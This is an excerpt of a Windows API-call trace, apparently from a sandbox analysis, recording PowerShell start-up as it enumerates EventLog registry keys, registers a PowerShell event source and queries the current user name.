	[0344.423] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x3, lpName=0x414cc0, lpcchName=0x1acf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1acf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.423] CoTaskMemFree (pv=0x414cc0) 
	[0344.423] CoTaskMemFree (pv=0x0) 
	[0344.423] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.423] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x4, lpName=0x414cc0, lpcchName=0x1acf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1acf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.423] CoTaskMemFree (pv=0x414cc0) 
	[0344.423] CoTaskMemFree (pv=0x0) 
	[0344.423] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.423] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x5, lpName=0x414cc0, lpcchName=0x1acf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1acf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.423] CoTaskMemFree (pv=0x414cc0) 
	[0344.423] CoTaskMemFree (pv=0x0) 
	[0344.423] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.423] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x6, lpName=0x414cc0, lpcchName=0x1acf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1acf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.424] CoTaskMemFree (pv=0x414cc0) 
	[0344.424] CoTaskMemFree (pv=0x0) 
	[0344.424] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.424] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x7, lpName=0x414cc0, lpcchName=0x1acf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1acf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.424] CoTaskMemFree (pv=0x414cc0) 
	[0344.424] CoTaskMemFree (pv=0x0) 
	[0344.424] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.424] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x8, lpName=0x414cc0, lpcchName=0x1acf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1acf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.424] CoTaskMemFree (pv=0x414cc0) 
	[0344.424] CoTaskMemFree (pv=0x0) 
	[0344.424] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x344) returned 0x0
	[0344.424] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x0) returned 0x2
	[0344.424] RegOpenKeyExW (in: hKey=0x340, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x348) returned 0x0
	[0344.424] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x0) returned 0x2
	[0344.424] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x34c) returned 0x0
	[0344.424] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x0) returned 0x2
	[0344.425] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x350) returned 0x0
	[0344.425] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x0) returned 0x2
	[0344.425] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x354) returned 0x0
	[0344.425] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x0) returned 0x2
	[0344.425] RegOpenKeyExW (in: hKey=0x340, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x358) returned 0x0
	[0344.425] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x0) returned 0x2
	[0344.425] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x35c) returned 0x0
	[0344.425] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x0) returned 0x2
	[0344.425] RegOpenKeyExW (in: hKey=0x340, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x360) returned 0x0
	[0344.426] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x0) returned 0x2
	[0344.426] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x364) returned 0x0
	[0344.426] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x368) returned 0x0
	[0344.426] RegCloseKey (hKey=0x368) returned 0x0
	[0344.426] RegCloseKey (hKey=0x340) returned 0x0
	[0344.426] RegCloseKey (hKey=0x364) returned 0x0
	[0344.427] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf88 | out: phkResult=0x1acf88*=0x364) returned 0x0
	[0344.427] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1acefc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1acef8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1acefc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1acef8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.427] CoTaskMemFree (pv=0x0) 
	[0344.427] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.427] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x0, lpName=0x414cc0, lpcchName=0x1acf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1acf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.427] CoTaskMemFree (pv=0x414cc0) 
	[0344.427] CoTaskMemFree (pv=0x0) 
	[0344.427] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.427] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x1, lpName=0x414cc0, lpcchName=0x1acf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1acf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.427] CoTaskMemFree (pv=0x414cc0) 
	[0344.428] CoTaskMemFree (pv=0x0) 
	[0344.428] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.428] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x2, lpName=0x414cc0, lpcchName=0x1acf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1acf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.428] CoTaskMemFree (pv=0x414cc0) 
	[0344.428] CoTaskMemFree (pv=0x0) 
	[0344.428] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.428] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x3, lpName=0x414cc0, lpcchName=0x1acf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1acf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.428] CoTaskMemFree (pv=0x414cc0) 
	[0344.428] CoTaskMemFree (pv=0x0) 
	[0344.428] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.428] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x4, lpName=0x414cc0, lpcchName=0x1acf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1acf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.428] CoTaskMemFree (pv=0x414cc0) 
	[0344.428] CoTaskMemFree (pv=0x0) 
	[0344.428] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.428] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x5, lpName=0x414cc0, lpcchName=0x1acf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1acf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.428] CoTaskMemFree (pv=0x414cc0) 
	[0344.428] CoTaskMemFree (pv=0x0) 
	[0344.428] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.428] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x6, lpName=0x414cc0, lpcchName=0x1acf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1acf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.428] CoTaskMemFree (pv=0x414cc0) 
	[0344.428] CoTaskMemFree (pv=0x0) 
	[0344.429] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.429] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x7, lpName=0x414cc0, lpcchName=0x1acf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1acf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.429] CoTaskMemFree (pv=0x414cc0) 
	[0344.429] CoTaskMemFree (pv=0x0) 
	[0344.429] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.429] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x8, lpName=0x414cc0, lpcchName=0x1acf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1acf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.429] CoTaskMemFree (pv=0x414cc0) 
	[0344.429] CoTaskMemFree (pv=0x0) 
	[0344.429] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x340) returned 0x0
	[0344.429] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x0) returned 0x2
	[0344.429] RegOpenKeyExW (in: hKey=0x364, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x368) returned 0x0
	[0344.429] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x0) returned 0x2
	[0344.430] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x36c) returned 0x0
	[0344.430] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x0) returned 0x2
	[0344.430] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x370) returned 0x0
	[0344.430] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x0) returned 0x2
	[0344.430] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x374) returned 0x0
	[0344.430] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x0) returned 0x2
	[0344.430] RegOpenKeyExW (in: hKey=0x364, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x378) returned 0x0
	[0344.431] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x0) returned 0x2
	[0344.431] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x37c) returned 0x0
	[0344.431] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x0) returned 0x2
	[0344.431] RegOpenKeyExW (in: hKey=0x364, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x380) returned 0x0
	[0344.431] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x0) returned 0x2
	[0344.431] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x384) returned 0x0
	[0344.431] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfe8 | out: phkResult=0x1acfe8*=0x388) returned 0x0
	[0344.431] RegCloseKey (hKey=0x388) returned 0x0
	[0344.432] RegCloseKey (hKey=0x364) returned 0x0
	[0344.432] RegCloseKey (hKey=0x384) returned 0x0
	[0344.433] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf58 | out: phkResult=0x1acf58*=0x384) returned 0x0
	[0344.433] RegQueryInfoKeyW (in: hKey=0x384, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1acecc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1acec8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1acecc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1acec8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.433] CoTaskMemFree (pv=0x0) 
	[0344.433] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.433] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x0, lpName=0x414cc0, lpcchName=0x1acf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1acf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.433] CoTaskMemFree (pv=0x414cc0) 
	[0344.433] CoTaskMemFree (pv=0x0) 
	[0344.433] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.433] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x1, lpName=0x414cc0, lpcchName=0x1acf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1acf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.433] CoTaskMemFree (pv=0x414cc0) 
	[0344.433] CoTaskMemFree (pv=0x0) 
	[0344.433] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.433] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x2, lpName=0x414cc0, lpcchName=0x1acf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1acf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.433] CoTaskMemFree (pv=0x414cc0) 
	[0344.433] CoTaskMemFree (pv=0x0) 
	[0344.434] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.434] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x3, lpName=0x414cc0, lpcchName=0x1acf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1acf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.434] CoTaskMemFree (pv=0x414cc0) 
	[0344.434] CoTaskMemFree (pv=0x0) 
	[0344.434] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.434] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x4, lpName=0x414cc0, lpcchName=0x1acf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1acf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.434] CoTaskMemFree (pv=0x414cc0) 
	[0344.434] CoTaskMemFree (pv=0x0) 
	[0344.434] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.434] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x5, lpName=0x414cc0, lpcchName=0x1acf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1acf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.434] CoTaskMemFree (pv=0x414cc0) 
	[0344.434] CoTaskMemFree (pv=0x0) 
	[0344.434] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.434] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x6, lpName=0x414cc0, lpcchName=0x1acf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1acf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.434] CoTaskMemFree (pv=0x414cc0) 
	[0344.434] CoTaskMemFree (pv=0x0) 
	[0344.434] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.434] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x7, lpName=0x414cc0, lpcchName=0x1acf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1acf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.434] CoTaskMemFree (pv=0x414cc0) 
	[0344.434] CoTaskMemFree (pv=0x0) 
	[0344.434] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.434] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x8, lpName=0x414cc0, lpcchName=0x1acf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1acf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.434] CoTaskMemFree (pv=0x414cc0) 
	[0344.434] CoTaskMemFree (pv=0x0) 
	[0344.434] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x364) returned 0x0
	[0344.435] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x0) returned 0x2
	[0344.435] RegOpenKeyExW (in: hKey=0x384, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x388) returned 0x0
	[0344.435] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x0) returned 0x2
	[0344.435] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x38c) returned 0x0
	[0344.435] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x0) returned 0x2
	[0344.435] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x390) returned 0x0
	[0344.435] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x0) returned 0x2
	[0344.435] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x394) returned 0x0
	[0344.435] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x0) returned 0x2
	[0344.436] RegOpenKeyExW (in: hKey=0x384, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x398) returned 0x0
	[0344.436] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x0) returned 0x2
	[0344.436] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x39c) returned 0x0
	[0344.436] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x0) returned 0x2
	[0344.436] RegOpenKeyExW (in: hKey=0x384, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x3a0) returned 0x0
	[0344.436] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x0) returned 0x2
	[0344.436] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x3a4) returned 0x0
	[0344.436] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x3a8) returned 0x0
	[0344.436] RegCloseKey (hKey=0x3a8) returned 0x0
	[0344.436] RegCloseKey (hKey=0x384) returned 0x0
	[0344.437] RegCloseKey (hKey=0x3a4) returned 0x0
	[0344.697] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b9d0008
	[0345.078] ReportEventW (hEventLog=0x1b9d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3288380*="WSMan", lpRawData=0x32880f0) returned 1
	[0345.079] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0345.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.079] CoTaskMemFree (pv=0x467e50) 
	[0345.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.080] CoTaskMemAlloc (cb=0x804) returned 0x1b827950
	[0345.080] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b827950, nSize=0x1ad248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad248) returned 0x1
	[0345.081] CoTaskMemFree (pv=0x1b827950) 
	[0345.081] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0345.081] GetUserNameW (in: lpBuffer=0x414cc0, pcbBuffer=0x1ad288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad288) returned 1
	[0345.081] CoTaskMemFree (pv=0x414cc0) 
	[0345.081] ReportEventW (hEventLog=0x1b9d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x328d8b8*="Alias", lpRawData=0x328d648) returned 1
	[0345.082] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0345.082] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.082] CoTaskMemFree (pv=0x467e50) 
	[0345.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
